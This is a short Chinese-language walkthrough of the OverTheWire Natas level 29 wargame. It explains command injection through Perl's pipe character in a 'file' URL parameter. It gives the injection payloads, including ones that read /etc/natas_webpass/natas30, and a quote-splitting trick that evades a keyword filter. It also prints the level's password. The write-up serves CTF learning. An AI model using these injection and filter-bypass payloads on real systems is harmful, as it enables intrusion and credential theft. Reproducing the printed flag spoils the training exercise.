在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
Natas29: 本关打开后,可以看到一个下拉列表,选择不同的内容,会得到不同的大量文本的页面。 观察url部分:http://natas29.natas.labs.overthewire.org/index.pl?file=perl+underground 感觉是一个命令注入,尝试一下file=|ls %00,可以在页面底部看到文件列表,由此我们确定存在命令注入漏洞。 尝试注入命令直接获取natas30的密码,结果并没有显示出密码。 payload:http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20/etc/natas_webpass/natas30+%20%00 由于刚才返回的文件列表中有index.pl,我们可以尝试打开index.pl来查看源码。 payload:http://natas29.natas.labs.overthewire.org/index.pl?file=|cat+index.pl%00 我们看到,源码过滤了natas,导致显示meeeeeep!。我们可以将其绕过,从而得到flag。 payload:http://natas29.natas.labs.overthewire.org/index.pl?file=|cat+/etc/na%22%22tas_webpass/nat%22%22as30%00 这里绕过过滤的方式有多种,比如
flag:wie9iexae0Daihohv8vuu3cei9wahf0e 总结: 1.在perl中“|”字符会将命令连接到脚本中。
参考: https://blog.csdn.net/baidu_35297930/article/details/99974886?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task |
请发表评论